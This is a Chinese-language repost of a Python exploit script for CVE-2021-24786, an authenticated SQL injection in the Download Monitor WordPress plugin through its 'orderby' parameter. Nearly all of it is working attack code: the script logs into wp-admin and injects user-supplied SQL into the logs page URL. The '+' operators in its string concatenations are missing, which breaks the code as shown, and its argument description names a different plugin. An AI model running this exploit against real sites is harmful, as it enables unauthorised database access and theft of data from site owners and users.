Wordpress Plugin Download Monitor WordPress V 4.4.4

# 测试环境：Ubuntu 20.04

# CVE：CVE-2021-24786

# CWE：CWE-89

# 文档：https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24786/README.md

'''

描述：

4.4.5 之前的 Download Monitor WordPress 插件无法正确验证和转义“orderby”GET 参数

在查看日志时在 SQL 语句中使用它之前，会导致 SQL 注入问题

'''

代码语言：javascript复制

# Banner:
banner = '''

   ___         __    ____   ___ ____  _      ____  _  _ _____ ___   __   
  / __/   //__  |___  / _ ___ / |    |___ | || |___  ( _ ) / /_  
 / /     / /______ __) | | | |__) | |_____ __) | || |_ / // _ | '_  
/ /___   V //_|_____/ __/| |_| / __/| |_____/ __/|__   _/ /| (_) | (_) |
____/   _/__/    |_____|___/_____|_|    |_____|  |_|/_/  ___/ ___/ 
                                                                         
                                  [ ] Download Monitor - SQL-Injection
                                  [@] Developed by Ron Jost (Hacker5preme)
'''
print(banner)

import argparse
import requests
from datetime import datetime

# User-Input:
my_parser = argparse.ArgumentParser(description='Wordpress Plugin RegistrationMagic - SQL Injection')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
username = args.USERNAME
password = args.PASSWORD

print('[*] Starting Exploit at: '   str(datetime.now().strftime('%H:%M:%S')))

# Authentication:
session = requests.Session()
auth_url = 'http://'   target_ip   ':'   target_port   wp_path   'wp-login.php'
check = session.get(auth_url)
# Header:
header = {
    'Host': target_ip,
    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
    'Accept': 'text/html,application/xhtml xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://'   target_ip,
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1'
}

# Body:
body = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'testcookie': '1'
}
auth = session.post(auth_url, headers=header, data=body)

# Exploit (WORKS ONLY IF ONE LOG EXISTS)
print('')
print ('[i] If the exploit does not work, log into wp-admin and add a file and download it to create a log')
print('')
# Generate payload for SQL-Injection
sql_injection_code = input('[ ] SQL-INJECTION COMMAND: ')
sql_injection_code = sql_injection_code.replace(' ', ' ')
exploitcode_url = 'http://'   target_ip   ':'   target_port   wp_path   'wp-admin/edit.php?post_type=dlm_download&page=download-monitor-logs&orderby=download_date`'   sql_injection_code   '`user_id'
exploit = session.get(exploitcode_url)
print(exploit)
print('Exploit finished at: '   str(datetime.now().strftime('%H:%M:%S')))

sql wordpress 网站建设

0 人点赞

Wordpress Plugin Download Monitor WordPress V 4.4.4 - SQL Injection